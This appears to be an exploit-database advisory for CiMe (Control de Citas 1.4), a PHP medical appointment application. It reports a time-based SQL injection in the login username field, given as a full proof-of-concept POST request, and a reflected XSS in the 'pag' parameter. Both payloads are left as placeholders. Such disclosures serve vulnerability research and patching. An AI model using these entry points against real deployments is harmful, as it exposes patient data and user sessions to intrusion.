[] NeoSense
E X P L O I T S
title author type platform port cve id

CiMe Citas Médicas - Multiple Vulnerabilities

Author: vinicius777
type: webapps
platform: php
port: 80.0
date_added: 2014-02-16 
date_updated: 2014-02-16 
verified: 1 
codes: OSVDB-103457;OSVDB-103456 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comcime-20110215-v1.4.zip
# Exploit Title: Control de Citas 1.4 (CIME) - Multiple Vulnerabilities
# Date: 01/02/2014
# Exploit Author: vinicius777
# Contact: vinicius777 [AT] gmail / @vinicius777_
# Vendor Homepage: http://www.cgaredes.tk/
# Software Link: http://sourceforge.net/projects/cime/files/latest/download?source=directory


[1] SQL Injection - 'USERNAME' vulnerable to time based attack

P0C: POST REQUEST

POST /cime/citasmedicas.php?pag=citasmedindex HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:22.0) Gecko/20100101 Firefox/22.0 Iceweasel/22.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/cime/citasmedicas.php?pag=citasmedindex
Cookie: PHPSESSID=ftkms6mdqi3039r41felgm39s1;
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 27

username=[SQL INJECTION]&password=pass


[2] XSS Reflected on citasmedicas.php (must be logged)

P0C = http://localhost/cime/citasmedicas.php?pag=[XSS]



##
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.